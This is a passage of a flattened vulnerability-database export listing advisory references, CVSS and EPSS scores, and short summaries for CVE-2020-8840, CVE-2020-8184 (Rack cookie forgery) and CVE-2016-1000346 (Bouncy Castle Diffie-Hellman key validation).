value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r6fdd4c61a09a0c89f581b4ddb3dc6f154ab0c705fcfd0a7358b2e4e5@%3Cissues.zookeeper.apache.org%3E
22
reference_url https://lists.apache.org/thread.html/r7762d69e85c58d6948823424017ef4c08f47de077644277fa18cc116@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r7762d69e85c58d6948823424017ef4c08f47de077644277fa18cc116@%3Cdev.ranger.apache.org%3E
23
reference_url https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E
24
reference_url https://lists.apache.org/thread.html/r8170007fd9b263d65b37d92a7b5d7bc357aedbb113a32838bc4a9485@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r8170007fd9b263d65b37d92a7b5d7bc357aedbb113a32838bc4a9485@%3Cissues.zookeeper.apache.org%3E
25
reference_url https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E
26
reference_url https://lists.apache.org/thread.html/r94930e39b60fff236160c1c4110fe884dc093044b067aa5fc98d7ee1@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r94930e39b60fff236160c1c4110fe884dc093044b067aa5fc98d7ee1@%3Cdev.ranger.apache.org%3E
27
reference_url https://lists.apache.org/thread.html/r9e59ebaf76fd00b2fa3ff5ebf18fe075ca9f4376216612c696f76718@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r9e59ebaf76fd00b2fa3ff5ebf18fe075ca9f4376216612c696f76718@%3Cdev.ranger.apache.org%3E
28
reference_url https://lists.apache.org/thread.html/r9ecf211c22760b00967ebe158c6ed7dba9142078e2a630ab8904a5b7@%3Cdev.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r9ecf211c22760b00967ebe158c6ed7dba9142078e2a630ab8904a5b7@%3Cdev.zookeeper.apache.org%3E
29
reference_url https://lists.apache.org/thread.html/ra275f29615f35d5b40106d1582a41e5388b2a5131564e9e01a572987@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/ra275f29615f35d5b40106d1582a41e5388b2a5131564e9e01a572987@%3Cdev.ranger.apache.org%3E
30
reference_url https://lists.apache.org/thread.html/rac5ee5d686818be7e7c430d35108ee01a88aae54f832d32f62431fd1@%3Cnotifications.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rac5ee5d686818be7e7c430d35108ee01a88aae54f832d32f62431fd1@%3Cnotifications.zookeeper.apache.org%3E
31
reference_url https://lists.apache.org/thread.html/rb43f9a65150948a6bebd3cb77ee3e105d40db2820fd547528f4e7f89@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb43f9a65150948a6bebd3cb77ee3e105d40db2820fd547528f4e7f89@%3Cissues.zookeeper.apache.org%3E
32
reference_url https://lists.apache.org/thread.html/rb5eedf90ba3633e171a2ffdfe484651c9490dc5df74c8a29244cbc0e@%3Ccommits.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb5eedf90ba3633e171a2ffdfe484651c9490dc5df74c8a29244cbc0e@%3Ccommits.zookeeper.apache.org%3E
33
reference_url https://lists.apache.org/thread.html/rb73708bf714ed6dbc1212da082e7703e586077f0c92f3940b2e82caf@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb73708bf714ed6dbc1212da082e7703e586077f0c92f3940b2e82caf@%3Cdev.ranger.apache.org%3E
34
reference_url https://lists.apache.org/thread.html/rb99c7321eba5d4c907beec46675d52827528b738cfafd48eb4d862f1@%3Cdev.tomee.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb99c7321eba5d4c907beec46675d52827528b738cfafd48eb4d862f1@%3Cdev.tomee.apache.org%3E
35
reference_url https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E
36
reference_url https://lists.apache.org/thread.html/rc717fd6c65190f4e592345713f9ef0723fb7d71f624caa2a17caa26a@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rc717fd6c65190f4e592345713f9ef0723fb7d71f624caa2a17caa26a@%3Cdev.ranger.apache.org%3E
37
reference_url https://lists.apache.org/thread.html/rcc72b497e3dff2dc62ec9b89ceb90bc4e1b14fc56c3c252a6fcbb013@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rcc72b497e3dff2dc62ec9b89ceb90bc4e1b14fc56c3c252a6fcbb013@%3Cdev.ranger.apache.org%3E
38
reference_url https://lists.apache.org/thread.html/rdea588d4a0ebf9cb7ce8c3a8f18d0d306507c4f8ba178dd3d20207b8@%3Cdev.tomee.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rdea588d4a0ebf9cb7ce8c3a8f18d0d306507c4f8ba178dd3d20207b8@%3Cdev.tomee.apache.org%3E
39
reference_url https://lists.apache.org/thread.html/rdf311f13e6356297e0ffe74397fdd25a3687b0a16e687c3ff5b834d8@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rdf311f13e6356297e0ffe74397fdd25a3687b0a16e687c3ff5b834d8@%3Cdev.ranger.apache.org%3E
40
reference_url https://lists.apache.org/thread.html/rdf8d389271a291dde3b2f99c36918d6cb1e796958af626cc140fee23@%3Ccommits.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rdf8d389271a291dde3b2f99c36918d6cb1e796958af626cc140fee23@%3Ccommits.zookeeper.apache.org%3E
41
reference_url https://lists.apache.org/thread.html/re7326b8655eab931f2a9ce074fd9a1a51b5db11456bee9b48e1e170c@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/re7326b8655eab931f2a9ce074fd9a1a51b5db11456bee9b48e1e170c@%3Cissues.zookeeper.apache.org%3E
42
reference_url https://lists.apache.org/thread.html/re8ae2670ec456ef1c5a2a661a2838ab2cd00e9efa1e88c069f546f21@%3Ccommits.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/re8ae2670ec456ef1c5a2a661a2838ab2cd00e9efa1e88c069f546f21@%3Ccommits.zookeeper.apache.org%3E
43
reference_url https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E
44
reference_url https://lists.apache.org/thread.html/rf28ab6f224b48452afd567dfffb705fbda0fdbbf6535f6bc69d47e91@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rf28ab6f224b48452afd567dfffb705fbda0fdbbf6535f6bc69d47e91@%3Cdev.ranger.apache.org%3E
45
reference_url https://lists.apache.org/thread.html/rfc1ccfe89332155b72ce17f13a2701d3e7b9ec213324ceb90e79a28a@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rfc1ccfe89332155b72ce17f13a2701d3e7b9ec213324ceb90e79a28a@%3Cdev.ranger.apache.org%3E
46
reference_url https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html
47
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-8840
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-8840
48
reference_url https://security.netapp.com/advisory/ntap-20200327-0002
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20200327-0002
49
reference_url https://security.netapp.com/advisory/ntap-20200327-0002/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20200327-0002/
50
reference_url https://www.oracle.com/security-alerts/cpuapr2020.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuapr2020.html
51
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
52
reference_url http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-01-fastjason-en
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-01-fastjason-en
53
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1816330
reference_id 1816330
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1816330
54
reference_url https://github.com/advisories/GHSA-4w82-r329-3q67
reference_id GHSA-4w82-r329-3q67
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4w82-r329-3q67
55
reference_url https://access.redhat.com/errata/RHSA-2020:1644
reference_id RHSA-2020:1644
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1644
56
reference_url https://access.redhat.com/errata/RHSA-2020:2067
reference_id RHSA-2020:2067
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2067
57
reference_url https://access.redhat.com/errata/RHSA-2020:2511
reference_id RHSA-2020:2511
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2511
58
reference_url https://access.redhat.com/errata/RHSA-2020:2512
reference_id RHSA-2020:2512
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2512
59
reference_url https://access.redhat.com/errata/RHSA-2020:2513
reference_id RHSA-2020:2513
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2513
60
reference_url https://access.redhat.com/errata/RHSA-2020:2515
reference_id RHSA-2020:2515
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2515
61
reference_url https://access.redhat.com/errata/RHSA-2020:2813
reference_id RHSA-2020:2813
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2813
62
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
63
reference_url https://access.redhat.com/errata/RHSA-2020:3196
reference_id RHSA-2020:3196
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3196
64
reference_url https://access.redhat.com/errata/RHSA-2020:3197
reference_id RHSA-2020:3197
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3197
65
reference_url https://access.redhat.com/errata/RHSA-2020:3779
reference_id RHSA-2020:3779
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3779
66
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
67
reference_url https://access.redhat.com/errata/RHSA-2025:1746
reference_id RHSA-2025:1746
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1746
68
reference_url https://usn.ubuntu.com/USN-4813-1/
reference_id USN-USN-4813-1
reference_type
scores
url https://usn.ubuntu.com/USN-4813-1/
fixed_packages
aliases CVE-2020-8840, GHSA-4w82-r329-3q67
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xnyb-nuwm-pkdr
81
url VCID-xnz5-gv2x-17bk
vulnerability_id VCID-xnz5-gv2x-17bk
summary 
Rack allows Percent-encoded cookies to overwrite existing prefixed cookie names
A reliance on cookies without validation/integrity check security vulnerability exists in rack < 2.2.3, rack < 2.1.4 that makes it possible for an attacker to forge a secure or host-only cookie prefix.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8184.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8184.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-8184
reference_id
reference_type
scores
0
value 0.01067
scoring_system epss
scoring_elements 0.77705
published_at 2026-04-13T12:55:00Z
1
value 0.01067
scoring_system epss
scoring_elements 0.77706
published_at 2026-04-12T12:55:00Z
2
value 0.01067
scoring_system epss
scoring_elements 0.77722
published_at 2026-04-11T12:55:00Z
3
value 0.01067
scoring_system epss
scoring_elements 0.77696
published_at 2026-04-09T12:55:00Z
4
value 0.01067
scoring_system epss
scoring_elements 0.7769
published_at 2026-04-08T12:55:00Z
5
value 0.01067
scoring_system epss
scoring_elements 0.77662
published_at 2026-04-07T12:55:00Z
6
value 0.01162
scoring_system epss
scoring_elements 0.7859
published_at 2026-04-04T12:55:00Z
7
value 0.01162
scoring_system epss
scoring_elements 0.78559
published_at 2026-04-02T12:55:00Z
8
value 0.01162
scoring_system epss
scoring_elements 0.78552
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-8184
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8184
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8184
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/rack/rack
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rack/rack
5
reference_url https://github.com/rack/rack/commit/1f5763de6a9fe515ff84992b343d63c88104654c
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rack/rack/commit/1f5763de6a9fe515ff84992b343d63c88104654c
6
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2020-8184.yml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2020-8184.yml
7
reference_url https://groups.google.com/g/rubyonrails-security/c/OWtmozPH9Ak
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://groups.google.com/g/rubyonrails-security/c/OWtmozPH9Ak
8
reference_url https://hackerone.com/reports/895727
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://hackerone.com/reports/895727
9
reference_url https://lists.debian.org/debian-lts-announce/2020/07/msg00006.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/07/msg00006.html
10
reference_url https://lists.debian.org/debian-lts-announce/2023/01/msg00038.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2023/01/msg00038.html
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-8184
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-8184
12
reference_url https://usn.ubuntu.com/4561-1
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4561-1
13
reference_url https://usn.ubuntu.com/4561-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4561-1/
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1849141
reference_id 1849141
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1849141
15
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=963477
reference_id 963477
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=963477
16
reference_url https://github.com/advisories/GHSA-j6w9-fv6q-3q52
reference_id GHSA-j6w9-fv6q-3q52
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j6w9-fv6q-3q52
17
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
18
reference_url https://usn.ubuntu.com/4561-2/
reference_id USN-4561-2
reference_type
scores
url https://usn.ubuntu.com/4561-2/
19
reference_url https://usn.ubuntu.com/USN-5253-1/
reference_id USN-USN-5253-1
reference_type
scores
url https://usn.ubuntu.com/USN-5253-1/
fixed_packages
aliases CVE-2020-8184, GHSA-j6w9-fv6q-3q52
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xnz5-gv2x-17bk
82
url VCID-xzbt-bkdp-8bgh
vulnerability_id VCID-xzbt-bkdp-8bgh
summary In the Bouncy Castle JCE Provider version 1.55 and earlier the other party DH public key is not fully validated. This can cause issues as invalid keys can be used to reveal details about the other party's private key where static Diffie-Hellman is in use. As of release 1.56 the key parameters are checked on agreement calculation.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2669
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2669
1
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000346.json
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000346.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-1000346
reference_id
reference_type
scores
0
value 0.00962
scoring_system epss
scoring_elements 0.7645
published_at 2026-04-02T12:55:00Z
1
value 0.00962
scoring_system epss
scoring_elements 0.76504
published_at 2026-04-09T12:55:00Z
2
value 0.00962
scoring_system epss
scoring_elements 0.76529
published_at 2026-04-11T12:55:00Z
3
value 0.00962
scoring_system epss
scoring_elements 0.76508
published_at 2026-04-12T12:55:00Z
4
value 0.00962
scoring_system epss
scoring_elements 0.76502
published_at 2026-04-13T12:55:00Z
5
value 0.00962
scoring_system epss
scoring_elements 0.76478
published_at 2026-04-04T12:55:00Z
6
value 0.00962
scoring_system epss
scoring_elements 0.76492
published_at 2026-04-08T12:55:00Z
7
value 0.00962
scoring_system epss
scoring_elements 0.76445
published_at 2026-04-01T12:55:00Z
8
value 0.00962
scoring_system epss
scoring_elements 0.7646
published_at 2026-04-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-1000346
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000346
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000346
5
reference_url https://github.com/bcgit/bc-java
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java
6
reference_url https://github.com/bcgit/bc-java/commit/1127131c89021612c6eefa26dbe5714c194e7495
reference_id
reference_type
scores
url https://github.com/bcgit/bc-java/commit/1127131c89021612c6eefa26dbe5714c194e7495
7
reference_url https://github.com/bcgit/bc-java/commit/1127131c89021612c6eefa26dbe5714c194e7495#diff-d525a20b8acaed791ae2f0f770eb5937
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java/commit/1127131c89021612c6eefa26dbe5714c194e7495#diff-d525a20b8acaed791ae2f0f770eb5937
8
reference_url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
9
reference_url https://security.netapp.com/advisory/ntap-20181127-0004
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20181127-0004
10
reference_url https://security.netapp.com/advisory/ntap-20181127-0004/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20181127-0004/
11
reference_url https://usn.ubuntu.com/3727-1
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/3727-1
12
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
